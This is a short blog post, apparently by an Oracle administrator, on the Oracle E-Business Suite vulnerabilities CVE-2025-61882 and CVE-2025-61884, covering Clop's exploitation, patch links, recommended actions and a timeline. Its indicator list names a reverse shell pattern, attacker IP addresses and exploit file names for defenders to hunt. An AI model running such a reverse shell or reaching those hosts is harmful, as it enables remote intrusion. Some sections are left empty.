CVE-2025-61882 and CVE-2025-61884 Oracle E-Business Suite Security Alert addresses vulnerability R12.2

 Dear All,

In this post i am sharing details related to Oracle E-Business Suite Security Alert addresses vulnerability  R12.2 versions which are reported recently in this year 2025.

Vulnerability in EBS R12.2 versions.

CVE-2025-61882 ::: 

The vulnerability lies in the BI Publisher Integration component of Oracle’s Concurrent Processing module, part of EBS versions 12.2.3 through 12.2.14. It allows unauthenticated attackers to send specially crafted HTTP requests that lead to remote code execution on the affected server.

Critical unauthenticated remote code execution (RCE) in Oracle E-Business Suite (EBS)

> Actively exploited in Clop-led data theft and extortion attacks

> Exploit and Oracle source code leaked publicly

> Emergency patch released

 

Oracle has released an emergency patch for a critical zero-day vulnerability in Oracle E-Business Suite, tracked as CVE-2025-61882. The flaw, with a CVSS score of 9.8, allows attackers to execute arbitrary code remotely without authentication.

Reports from Oracle, Mandiant, and independent researchers confirm the vulnerability has been actively exploited in Clop ransomware (Ransomware is a type of malicious software (malware) )  group campaigns, leading to large-scale data theft and extortion. Public indicators of compromise (IOCs) now match exploit code that leaked on Telegram, confirming this is the same vulnerability used in recent attacks.

 

https://support.oracle.com/epmos/faces/DocumentDisplay?_afrLoop=274578431489086&id=3106344.1&_afrWindowMode=0&_adf.ctrl-state=1a0ce4gyc8_53

EBS R12.2 Environment :

EBS R12.1.3 Environment : 

 

CVE-2025-61884 ::

======== ==== 

https://support.oracle.com/epmos/faces/DocumentDisplay?_afrLoop=274764861518353&id=3107176.1&_afrWindowMode=0&_adf.ctrl-state=1a0ce4gyc8_102

 

post 884 fixup we may see this issue , you can apply the given patch to fix that issue.

Recommended actions

• Patch immediately: Apply Oracle’s Security Alert update for CVE-2025-61882. Ensure the October 2025 Critical Patch Update is installed first.
• Hunt for the following IOCs: Reverse shell commands (/bin/bash -i >& /dev/tcp), unexpected child processes from the EBS Java service, the IPs 200.107.207.26 and 185.181.60.11, and presence of files exp.py, server.py, or oracle_ebs_nday_exploit*.zip.
• Review access exposure: Identify any externally accessible EBS instances or outdated versions.
• Increase runtime visibility: Monitor for process and library behavior within application workloads, not just endpoints.

 

 

• June 2025: Dark Web posts advertise an Oracle EBS zero-day exploit for sale (~$70,000).
• August 2025: Clop begins an extortion campaign targeting EBS servers across multiple organizations.
• October 4, 2025: Oracle publishes a Security Alert for CVE-2025-61882 and releases an emergency patch.
• October 5, 2025: Mandiant confirms Clop leveraged both previously patched July vulnerabilities and this new zero-day.
• October 6, 2025: Exploit archive and partial Oracle source code leaked by a group calling itself Scattered Lapsus$ Hunters.

Importent dates : 

Thanks,

Srini